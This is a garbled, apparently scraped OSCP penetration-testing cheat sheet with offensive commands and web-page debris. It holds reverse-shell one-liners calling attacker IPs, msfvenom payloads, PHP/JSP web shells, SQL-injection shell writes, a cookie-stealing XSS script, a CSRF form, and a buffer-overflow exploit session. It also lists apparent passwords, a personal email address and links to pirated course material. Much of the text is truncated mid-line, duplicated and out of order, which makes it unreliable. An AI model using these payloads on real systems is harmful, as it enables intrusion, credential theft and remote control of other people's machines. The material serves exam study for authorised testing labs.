http://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf (Netcat)
http://download.vulnhub.com/pentesterlab/php_include_and_post_exploitation.pdf (PHP Include and Post Exploitation
Best Book I refer:

http://www.amazon.com/Penetration-Testing-Hands-On-Introduction-Hacking/dp/1593275641
Windows compiled Exploit Reference:
Those who have not enough lab time to compile their windows exploit, I will recommend you to download and compile
https://www.securitysift.com/offsec-pwb-oscp/
I uploaded those pre-compiled exploits in mediafire with password protected, but i discourage that becoz exploit comp
http://www.securitysift.com/download/MS_privesc_and_exploits_table.csv
I Hopes, It will helpful for guys who doing OSCP Training and Exam. If any doubts related to the post ping me…
About these ads
Tags: (OSCP), offsec, oscp exam hints, oscp exam tips, oscp lab hints, oscp lab tips, oscp tips, OSCP Tips and Tricks, oscp
fessional-handy-tips-and-tricks/
tar.gz && tar xzf nmap_nse_vulscan-2.0.tar.gz

map -sI ip target
scan form diff IP)
e” start= auto error= ignore
ons /t REG_DWORD /d 0
PORT=443 RHOST=IP E
“<|<=” | sort -k3
code -t asp -o file.asp
-e x86/shikata_ga_nai -b “\x00″ -t c
Port to Connect On> R | msfencode -t elf -o shell
Connect On> R | msfencode -b “\x00\x0a\x0d”
onnect On> R > shell.py

Port to Connect On> R | msfencode -t asp -o shell.asp
nect On> R > shell.sh
o Connect On> R > shell.php
Port to Connect On> X >shell.exe

-u $user -l; done
-e x86/shikata_ga_nai -b “\x00″ -t c
r: while read line 0<&5; do $line 2>&5 >&5; done
DIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’
DIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’
$~->fdopen($c,w);system$_ while<>;’
$~->fdopen($c,w);system$_ while<>;’
me(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/
me(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/
open(cmd,”r”){|io|c.print io.read}end’
open(cmd,”r”){|io|c.print io.read}end’
”r”){|io|c.print io.read}end’
”r”){|io|c.print io.read}end’
&%d 2>&%d”,f,f,f)’
&%d 2>&%d”,f,f,f)’
EAM);s.connect((“10.0.0.1″,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”
EAM);s.connect((“10.0.0.1″,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”

port 6001). One way to do this is with Xnest: It is available on Ubuntu.
n this INSIDE the spawned xterm on the open X Server

your system:
eed to specify its filepath:

ine; do \$line 2>&5 >&5; done”] as String[])
(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))//–></SCRIPT>”>’><SCRIPT>alert(String.fromCharCod
#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&amp
#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&amp
http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E
henticated-smb-sessions
hashcat-0156543/
he Grey Corner explains exploit from basic to intermediate level with step by step debugging.
01/beginning-stack-based-buffer-overflow.html
10/01/seh-stack-based-windows-buffer-overflow.html
er.blogspot.com/2010/01/windows-buffer-overflow-tutorial.html
/grey-corner.blogspot.com/2010/01/heap-spray-exploit-tutorial-internet.html
rner.blogspot.com/2010/02/windows-buffer-overflow-tutorial.html
one who has provided most comprehensive guides on exploit development and keeps updating from time to time that I have ever s
x.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/
w.corelan.be:8800/index.php/2009/07/23/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-2/
hp/2009/07/25/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-3-seh/
corelan.be:8800/index.php/2009/07/28/seh-based-exploit-writing-tutorial-continued-just-another-example-part-3b/
lan.be:8800/index.php/2009/08/12/exploit-writing-tutorials-part-4-from-exploit-to-metasploit-the-basics/
it development – http://www.corelan.be:8800/index.php/2009/09/05/exploit-writing-tutorial-part-5-how-debugger-modules-plu
R – http://www.corelan.be:8800/index.php/2009/09/21/exploit-writing-tutorial-part-6-bypassing-stack-cookies-safeseh-hw-dep
be:8800/index.php/2009/11/06/exploit-writing-tutorial-part-7-unicode-from-0x00410041-to-calc/
php/2010/01/09/exploit-writing-tutorial-part-8-win32-egg-hunting/
e:8800/index.php/2010/02/25/exploit-writing-tutorial-part-9-introduction-to-win32-shellcoding/
ed-overflows/
scalation – Brett Moore

Is The New Black Rob Fuller And Chris Gates
BVYei5qx (Python Penetration Testing)
0228.pdf (Linux Unix Post Exploitation Command)
-pdf#scribd (Post Exploitation Command List)
Include and Post Exploitation)

you to download and compile the Mike Czumak Windows pre-compiled reference chart. I compiled it using Visual Studio and GNU C
rage that becoz exploit compilation is one of the exercise in the course so you have to do it your own. if anyone need that mail me at
o the post ping me…
, OSCP Tips and Tricks, oscp tricks, Penetration Testing with Kali Linux, The Offensive Security Certified Professional
(STDERR,”>&S”);exec(“/bin/sh -i”);};’
(STDERR,”>&S”);exec(“/bin/sh -i”);};’
ubprocess.call([“/bin/sh”,”-i”]);’
ubprocess.call([“/bin/sh”,”-i”]);’
PT>alert(String.fromCharCode(88,83,83))</SCRIPT>
mp;#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&am
mp;amp;#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&
me to time that I have ever seen).
xample-part-3b/
-how-debugger-modules-plugins-can-speed-up-basic-exploit-development/
tack-cookies-safeseh-hw-dep-and-aslr/
sing Visual Studio and GNU Code-blocks, really it will very useful at the time of exam.
anyone need that mail me at sathisharthar@gmail.com (Note: don’t try to bruteforce it, its more than 20 words)
d Professional
mp;#40;&#39;&#88;&#83;&#83;&#39;&#41;>
0108&#0000101&#0000114&#0000116&#0000040&#0000039&#00
mp;#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
&#0000041>
Sans 710: https://mega.nz/#!QNRxSaLY!sRHMVAyZ8f9Fqaq2O-g-5dVmU4WfIczgeaMz98kPGps
Sans 560: http://certcollection.org/forum/topic/292558-mega-sans-560-network-penetration-testing/
Sans 517: http://certcollection.org/forum/topic/292541-mega-sans-517-cutting-edge-hacking-techniques/
Sans 531: http://certcollection.org/forum/topic/292540-mega-sans-531-sans-windows-command-line-kung-fu/
Sans 617: http://certcollection.org/forum/topic/292539-mega-sans-617-wireless-ethical-hacking-penetration-testing-
Sans 506: http://certcollection.org/forum/topic/292493-mega-sans-506-securing-linuxunix/
Sans 508: http://certcollection.org/forum/topic/292127-mega-sans-508-advanced-digital-forensics-and-incident-resp
Sans 503: http://certcollection.org/forum/topic/292121-mega-sans-503-intrusion-detection-in-depth/
Sans 502: http://certcollection.org/forum/topic/292106-mega-sans-502-perimeter-protection-in-depth/
Sans 401: http://certcollection.org/forum/topic/292086-mega-sans-401-security-essentials/
Sans 610: http://certcollection.org/forum/topic/288694-mega-sans-610-reverse-engineering-malware/
Sans 660: http://certcollection.org/forum/topic/288708-mega-sans-660-advanced-pentration-testing-exploits-gxpn/
https://lab.pentestit.ru/
alok.3181
qwerty@123
mega.nz
5>]Y$gj@W<gC4JHJ
Awesome CTF
Captf.com -- search github
#CTF #wargame
https://io.netgarage.org/
http://reversing.kr/index.php
https://exploit-exercises.com/
http://smashthestack.org/
https://www.root-me.org/?page=news&lang=en
https://www.pwnerrank.com/categories/binary-exploitation/
https://w3challs.com/
https://pwnable.tw/
https://www.vulnhub.com/
https://ctftime.org/ctfs
https://shellterlabs.com/en/
vulnhub 136 --- last page direct web to terminal accesss

WordList Link :- https://blog.thireus.com/web-common-directories-and-filenames-word-lists-collect
ation-testing/
cking-techniques/
ommand-line-kung-fu/
hacking-penetration-testing-and-defenses/
l-forensics-and-incident-response/
ion-in-depth/
ction-in-depth/
ring-malware/
ation-testing-exploits-gxpn/
-filenames-word-lists-collection/
reverse_shell_all:
https://highon.coffee/blog/reverse-shell-cheat-sheet/#bash-reverse-shells
php -r '$sock=fsockopen("192.168.0.13",6666);exec("/bin/sh -i <&3 >&3 2>&3");'
PHP one-line webshell: <?php echo exec($_GET["cmd"]);?>

netcat with -e option: http://192.168.2.120/logs/backup_log.php?cmd=nc -nlvp 2608 -e /bin/bash
python -c 'import pty;pty.spawn("/bin/bash")'
spawn shell : https://netsec.ws/?p=337
grep -i "kernel 2.6" files.csv

head platforms/linux/local/8572.c
whereis gcc
gcc platforms/linux/local/8572.c -o /tmp/evil

vi platforms/linux/local/8572.c
scp -C /tmp/out hbeale@192.168.2.120 -i /root/sshkey
-----------php----------
upload below as .png or sent it as part of input
<? readfile("/etc/passwd"); ?>
<? echo('test') ?> - test in burp if works, replace test with base64 of reverse php shell
Try in burp:
<?php
$out = file_get_contents($_REQUEST['f']);
echo "<pre>$outt</pre>";
?>
if works, cmd injection present, try below:
<?php
$cmd = ($_REQUEST["cmd"]);
$outt = exec($cmd);
in browser hash.php
try hash.php?cmd=pwd
nc -c /bin/sh 192.168.56.101 5600
nc -lvp 5600
python -c 'import pty; pty.spawn("/bin/bash")'
remote execution functions :: https://sekurak.pl/backdoory-w-aplikacjach-php/
echo "<pre>$outt</pre>";
?>
phpmyadmin --- run query and dump to php file

CREATE TABLE hacker(Stack TEXT) TYPE=MYSIaM;
INSERT INTO hacker VALUES(‘<pre><? @system($_REQUEST[“v”]); ?></pre>’); // upload a reverse shell
SELECT * INTO DUMPFILE '/var/www/backdoor.php' FROM hacker;
run in browser /backdoor.php?v=id
python sqlmap.py -u "http://192.168.0.112:666/index.php?option=com_abc&view=abc&letter=List+of+content+items.

cat /pentest/database/sqlmap/output/192.168.0.112/files/_etc_passwd
find / -name apache2.conf
tail /pentest/database/sqlmap/output/192.168.0.112/files/_etc_apache2_apache2.conf
grep -i "DocumentRoot" /pentest/database/sqlmap/output/192.168.0.112/files/_etc_apache2_sites-enabled_000-defau
cat /pentest/database/sqlmap/output/192.168.0.112/files/_var_www_configuration.php | grep -i pass -A 1 -B 1
// firefox -> 192.168.0.112:666/phpmyadmin/ # root yUtJklM97W
python sqlmap.py -u http://192.168.0.4/checklogin.php --data="myusername=admin&mypassword=123&Submit=Log
python sqlmap.py -u http://192.168.0.4/checklogin.php --data="myusername=admin&mypassword=123&Submit=Log
Below can be used with id and password box as well and then bd.php?cmd=ls
union select '<?php system($_GET["cmd"]); ?>', '' into outfile '/var/www/bd.php'#
--tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorek
whereis nc
/bin/nc.traditional 192.168.0.192 443 -e /bin/sh
for scan:
us -H -msf -Iv 192.168.1.88 -p 1-65535 && us -H -mU -Iv 192.168.1.88 -p 1-65535
nmap -p 1-65535 -T4 -A -v 192.168.1.88
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.34 LPORT=443 -f raw > evil.php

msfcli multi/handler PAYLOAD=php/meterpreter/reverse_tcp LHOST=192.168.1.34 LPORT=443 E
enum4linux --- for samba or smb shares

dig == zone transfer in case domain present and trusted ip present, add it to list and ip
sudo -l --- after normal user breaking

user can edit /etc/sudoers edit and you are root
echo os.system('/bin/bash')
sql injection test:

1' or '1'='1
or 1=1 -- -
get root if mysql running as root: (login to mysql ==> mysql -h localhost -u root -p , check for pass in config or using sqlm
)
https://www.adampalmer.me/iodigitalsec/2013/08/13/mysql-root-to-system-root-with-udf-for-windows-and-linux/
https://bernardodamele.blogspot.in/2009/01/command-execution-with-mysql-udf.html
mysql> select sys_exec('usermod -a -G admin john');
braking out of limited shell:

https://pen-testing.sans.org/blog/2012/06/06/escaping-restricted-linux-shells
http://exploit-db.com/sploits/2009-linux-sendpage3.tar.gz -- get error use wget

simple root.c
int main()
{
setresuid(0, 0, 0);
setresgid(0, 0, 0);
system( "/bin/bash" );
return 0;
}
smbservice:
nmblookup -A ip
smbclient -L \\SHARE -I IPaddress -N
rsa-key predict:
cat /root/.ssh/authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPF
Firefox www.exploit-db.com -> Debian OpenSSL Predictable (5720) -> http://milw0rm.com/sploits/debian_ssh_rsa_20
tar jxvf debian_ssh_rsa_2048_x86.tar.bz2
cd rsa/2048/
grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPF
ssh -i 57c3115d77c56390332dc5c49978627a-5429 root@192.168.1.105
priv-escaltion walkthrough for services:

https://tehaurum.wordpress.com/2015/06/14/metasploitable-2-walkthrough-an-exploitation-guide/
showmount -e ipaddress
if result /* then
mkdir /metafs # this will be the mount point
mount -t nfs 192.168.127.154:/ /metafs -o nolock # mount the remote shared directory as nfs and disable file locking
------------------------------------sql injection attack_example:=============================

email=' union select null,null,null,load_file('/var/www/mysqli_connect.php'),null,null,null,null-- -&pass=pass&submit=
//mysql -->user passwd: root goodday
//write php shell onto disk

email=' union select null,null,null,"<?php system($_GET['cmd']);?>",null,null,null,null into outfile '/var/www/shell.php'
//confirm shell is written to webserver root

email=' union select null,null,null,load_file('/var/www/shell.php'),null,null,null,null-- -&pass=pass&submit=Login&sub
//shell can be accessed at http://10.10.10.100/shell.php?cmd=[command]

http://10.10.10.100/shell.php?cmd=id
http://10.10.10.100/shell.php?cmd=uname -a
http://10.10.10.100/shell.php?cmd=which python
//python reverse shell one liner

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.50
//privilege escalation
/var/mysqli_connect.php has root password
ssh using this password
mount_nfs_share:
to check mount -e ipaddress
mkdir /tmp/nfs
mount -t nfs 192.168.1.72:/home/vulnix /tmp/nfs -nolock
sudo /usr/bin/nmap --interactive

nmap> !/bin/bash
python -m SimpleHTTPServer 991
# simple RFI
page=data://text/plain, <?php system("whoami");?>
# base64 encoded RFI

page=data://text/plain;base64,PD9waHAgc3lzdGVtKCJ3aG9hbWkiKTs/Pg==
# mini shell
page=data://text/plain,<?php system($_GET[cmd]);?>&cmd=id
# base64 + URL encoded mini shell (didn't work without URL encoding)
page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUW2NtZF0pOz8%2B&cmd=id
python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET, socket.SOCK_STREAM);s.connect((“192.168.22

--------------------get-cookie-------------------
<script>
var request = new XMLHttpRequest();
var url = 'http://192.168.222.128/' + document.cookie;
req.open ("GET", url);
req.send();
</script>
-----------------scrf-for-admin-messages---------------
<html>
<body>
<form name="changepass" method="post" action="http://127.0.0.1:8081/change-password">
<input type="hidden" name="username" value="spiderman">
<input type="hidden" name="password" value="abc123">
</form>
<script type="text/javascript">
document.changepass.submit();
</script>
</body>
</html>
shell-shock-privelege-escalation
sudo PS1="() { :;} ; /bin/sh" /home/bynarr/lime
gobuster -u http://192.168.252.140/ -w /usr/share/wordlists/wfuzz/general/common.txt
devnull' or '1
ATTACH DATABASE '/home/devnull/public_html/img/demo.php' as pwn;

CREATE TABLE pwn.shell (code TEXT); INSERT INTO pwn.shell (code) VALUES ("<pre><?php echo shell_exec($_GET['c
Priv-escalation-linux (chown, tar,chmod, rsync )

https://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt
web_delivery_exploit_windows:
https://www.rapid7.com/db/modules/exploit/multi/script/web_delivery
Microsoft Windows - Unauthenticated SMB Remote Code Execution (MS17-010)
https://vulners.com/exploitdb/EDB-ID:41891?utm_source=telegram&utm_medium=vulnersBot&utm_campaign=subsc
custom script to pull ans upload .phpshell
; echo '<?php error_reporting(E_ALL); ini_set(display_errors", 1); $fp = fopen($_POST["name"], "wb"); fwrite($fp, base6
python-upload script
import requests,base64
s = requests.session()
target = "http://10.200.0.104:33447/Challenge/test.php"
f = open('b374k.php')
payload = {
name: "test2.php",
content: base64.b64encode("\n".join(f.readlines()))
}
r = s.post(target, data=payload)
mysql -u root -p -h 192.168.56.102
Select "<?php echo shell_exec($_GET['cmd']);?>" into outfile "/var/www/https/blogblog/wp-content/uploads/shell.ph
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.0.2.8 LPORT=4444 -f raw -o meterpreter.php
nmap -sU -n -r -T4 192.168.231.128
--------------bypass file upload and browse ristrictions .php-------------

php://filter/convert.base64-encode/resource=
create a file with GIF extension and add GIF98 in the first line
For x in 1466 67 1468 1514 1981 1986; do nmap –Pn –host_timeout 201 –max-retries 0 –p $x 192.168.0.103; done.
lsb_release –a
find / -user root -perm -4000 -ls 2>/dev/null

msfvenom -p php/meterpreter_reverse_tcp LHOST=10.11.0.50 LPORT=1234 -f raw > shell.php
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.11.0.50 LPORT=1234 -f asp > shell.asp
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.11.0.50 LPORT=1234 -f raw > shell.jsp
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.11.0.50 LPORT=1234 -f war > shell.war
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.11.0.50
set LPORT 1234
set ExitOnSession false
exploit -j -z
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=10.11.0.50 LPORT=3333 -b "\x00" -e x86/
<% if (request.getParameter("cmd") != null) { out.println("Command: " + request.getParameter("cmd") + "<br />"); Pro
https://packetstormsecurity.com/files/139241/vbscan-0.1.7.tar.gz
Linux Kernel Multiple Prior to 2.6.24.1 Multiple Memory Access Vulnerabilities

http://www.securityfocus.com/bid/27704/exploit
Linux Kernel CVE-2012-0056 Local Privilege Escalation Vulnerability

http://www.securityfocus.com/bid/51625/discuss
Linux kernel ptrace/kmod local root exploit/all current 2.2.x and 2.4.x kernels
https://www.win.tue.nl/~aeb/linux/hh/ptrace-kmod-exploit.c
Windows priv Escalation

https://github.com/PowerShellMafia/PowerSploit
Sample for cmd-injection:

http://www.example.com/basilic/Config/diff.php?file=|cat /etc/passwd&new=1&old=2
to run reverse shell:
http://www.example.com/basilic/Config/diff.php?file=|nc -v 127.0.0.1 3333 -e /bin/bash&new=1&old=2
Windows priv escalation:

google Cesar Cerrudo
Reverse-shell(if things do not work)

http://pentestmonkey.net/tools/web-shells/php-findsock-shell
https://www.exploit-db.com/exploits/1198/
nmap -Pn -n -sT -sV -O -vv 10.11.1.49 -p0-65535
http://fuzzysecurity.com/tutorials/16.html
priv esc= half nelson, full nelson, vmsplice and sock sendpage
Commands to run on Windows

systeminfo
type boot.ini
hostname
ipconfig /all
netstat -ano
net users
net localgroups
route print
arp -A
netsh firewall show state
netsh firewall show config
schtasks /query /fo LIST /v
schtasks /query /fo LIST /v
net start
accesschk.exe -uwcqv "Authenticated Users" *
dir network-secret.txt /s
windump -i 2 -w capture -n -U -s 0 src not 10.11.0.X and dst not 10.11.0.X
Commands to run on Linux
uname -a
id
cat /proc/version
cat /etc/issue
ifconfig -a
netstat -ano
cat /etc/passwd
cat /etc/group
cat /etc/shadow
cat /etc/hosts
arp -a
iptables -L
crontab -l
find . -name "network-secret.txt"
tcpdump -i eth0 -w capture -n -U -s 0 src not 10.11.0.X and dst not 10.11.0.X
tcpdump -vv -i eth0 src not 10.11.0.Xand dst not 10.11.0.X
https://addons.mozilla.org/de/firefox/addon/wappalyzer/
http://tools.kali.org/information-gathering/dotdotpwn
https://bitvijays.github.io/blog/2015/04/09/learning-from-the-field-intelligence-gathering/
http://www.howtogeek.com/104337/hacker-geek-os-fingerprinting-with-ttl-and-tcp-window-sizes/
osce::
http://www.cs.fsu.edu/~redwood/OffensiveComputerSecurity/lectures.html
Web Payloads
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.11.0.50 LPORT=1234 -f raw > shell.php
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.11.0.50 LPORT=1234 -f asp > shell.asp
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.11.0.50 LPORT=1234 -f raw > shell.jsp
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.11.0.50 LPORT=1234 -f war > shell.war
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.11.0.50
set LPORT 1234
set ExitOnSession false
exploit -j -z
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=10.11.0.50 LPORT=3333 -b "\x00" -e x86/
<% if (request.getParameter("cmd") != null) { out.println("Command: " + request.getParameter("cmd") + "<br />"); Pro
-------------------------------------------------------------------------------------------------------------------------------------------------------
8 -e /bin/bash
a reverse shell
etter=List+of+content+items..." -p letter --banner --current-db --current-user --is-dba

etter=List+of+content+items..." -v 0 --passwords
etter=List+of+content+items..." -v 0 --dbs
etter=List+of+content+items..." -v 0 --tables -D joomla
etter=List+of+content+items..." -v 0 --dump -D joomla -T jos_users
etter=List+of+content+items..." -v 0 --file-read=/etc/passwd
etter=List+of+content+items..." -v 0 --file-read=/etc/apache2/apache2.conf
etter=List+of+content+items..." -v 0 --file-read=/etc/apache2/sites-enabled/000-default
che2_sites-enabled_000-default
etter=List+of+content+items..." -v 0 --file-read=/var/www/configuration.php # Joomla default
| grep -i pass -A 1 -B 1
password=123&Submit=Login" -v 0 --os-shell
password=123&Submit=Login" ' union select '<?php system($_GET["cmd"]); ?>', '' into outfile '/var/www/bd.php'#
greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursiver
or pass in config or using sqlmapy
-udf-for-windows-and-linux/
xpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0Q
m/sploits/debian_ssh_rsa_2048_x86.tar.bz2
xpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0Q
ation-guide/
nfs and disable file locking
null-- -&pass=pass&submit=Login&submitted=TRUE
outfile '/var/www/shell.php'-- -&pass=pass&submit=Login&submitted=TRUE

ss=pass&submit=Login&submitted=TRUE
EAM);s.connect(("10.10.10.50",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh",
EAM);s.connect((“192.168.222.128”,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/b

php echo shell_exec($_GET['c']); ?>");
ersBot&utm_campaign=subscription
me"], "wb"); fwrite($fp, base64_decode($_POST["content"])); fclose($fp);' > ../test.php
wp-content/uploads/shell.php";
$x 192.168.0.103; done.
PORT=3333 -b "\x00" -e x86/shikata_ga_nai -f exe -o /tmp/1.exe
meter("cmd") + "<br />"); Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); OutputStream os = p.getOutputStr

&new=1&old=2
PORT=3333 -b "\x00" -e x86/shikata_ga_nai -f exe -o /tmp/1.exe
meter("cmd") + "<br />"); Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); OutputStream os = p.getOutputStr
--------------------------------------
ww/bd.php'#
multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space
mVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0a
mVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0a
=subprocess.call(["/bin/sh","-i"]);'
o(),2);p=subprocess.call([“/bin/sh”,”-i”])
utStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String d
utStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String d
2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,vers
EGvw2zW1krU3Zo9Bzp0e0ac2U qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE kcP Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc W
EGvw2zW1krU3Zo9Bzp0e0ac2U qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE kcP Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc W

DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); } } %>
DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); } } %>
otes,versionedkeywords,versionedmorekeywords,xforwardedfor
5oGUkxdFo9f1nu2OwkjOc Wv8Vw7bwkf 1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== msfadmin@metasploitable
5oGUkxdFo9f1nu2OwkjOc Wv8Vw7bwkf 1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w *.pub

dLine(); } } %>
dLine(); } } %>

CheatSheets OSCP

Uploaded by

Copyright:

Available Formats

CheatSheets OSCP

Uploaded by

Document Information

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

CheatSheets OSCP

Uploaded by

Copyright:

Available Formats

Add Admin User Shellcode (194 bytes) - Any Windows Version

int main(int argc, char **argv){int (*f)();f = (int (*)())shellcode;(int)(*f)();}

$ wmic qfe get Caption,Description,HotFixID,InstalledOn

The output will be similar to this:

Windows Exploit Suggester

MS10-015 : User Mode to Ring (KiTrap0D)

SEARCHIVNG FOR SERVICES WITH MISCONFIGURE PERMISSION

sometimes escalation priviliges

python pyinstaller.py --onefile ms11-080.py

create a new windows user

abuse this by running c program using the linux crosscompiler

//compilethiscode i586-mingw32msvc-gcc useradd.c -o useradd.exe

rite kernel space.

Replaces space character after SQL statement with a valid random

Slash escape quotes (' and ")

Embraces complete query with versioned comment. Useful to bypass

Add random comments to SQL keywords.

Replaces AND and OR logical operators with their symbolic

Append a HTTP header 'X-originating-IP' to bypass WAF Protection of

Get jmp esp:

root@St0rn:~/Desktop# msfpayload windows/meterpreter/reverse_ord_tcp LHOST=192.168.23.10 LPORT=444 R | ms

from socket import *

s.send("user %s\r\n" % (user))

s.send("pass %s\r\n" % (password))

print "len: %d" % (len(buffer))

root@St0rn:~/Desktop# msfcli exploit/multi/handler LHOST=192.168.23.10 LPORT=444 PAYLOAD=windows/meterp

LHOST => 192.168.23.10

root@St0rn:~/exploit# python caesarftp.py 192.168.23.112

331 User login OK, waiting for password

230 User password OK, CesarFTP server ready

root@St0rn:~/Desktop# msfcli exploit/multi/handler LHOST=192.168.23.10 LPORT=444 PAYLOAD=windows/meterp

LHOST => 192.168.23.10

meterpreter > shell

C:\Documents and Settings\offsec>cd ../Administrator/Desktop

C:\Documents and Settings\Administrator\Desktop>dir

Directory of C:\Documents and Settings\Administrator\Desktop

02/07/2011 05:10 PM <DIR> .

C:\Documents and Settings\Administrator\Desktop>"C:\Documents and Settings\offsec\Desktop\Extras\nc.exe" 192.1

C:\Documents and Settings\Administrator\Desktop>

root@St0rn:~/Desktop# nc -lvp 66 > proof.txt

First create a job:

C:\Documents and Settings\offsec>at 16:44 /interactive cmd.exe

Change password of user1:

C:\Documents and Settings\offsec>net user user1 storn

and connect to rdp:

-17 23:20:37 +0200

OSCP Handy Commands by sathisharthars

Nmap Full Web Vulnerable Scan:

wget http://www.computec.ch/projekte/vulscan/download/nmap_nse_vulscan-2.0.tar.gz && tar xzf nmap_nse

nmap -sS -sV –script=vulscan/vulscan.nse target

nmap -sS -sV –script=vulscan/vulscan.nse –script-args vulscandb=scipvuldb.csv target

nmap -sS -sV –script=vulscan/vulscan.nse –script-args vulscandb=scipvuldb.csv -p80 target

nmap -PN -sS -sV –script=vulscan –script-args vulscancorrelation=1 -p80 target

nmap -sV –script=vuln target

nmap -PN -sS -sV –script=all –script-args vulscancorrelation=1 target

Dirb Directory Bruteforce:

dirb http://IP:PORT dirbuster-ng-master/wordlists/common.txt

nikto -C all -h http://IP

wpscan –url http://IP/ –enumerate p

uniscan.pl -u target -qweds

int main(int argc, char **argv){int (f)();f = (int ()())shellcode;(int)(*f)();}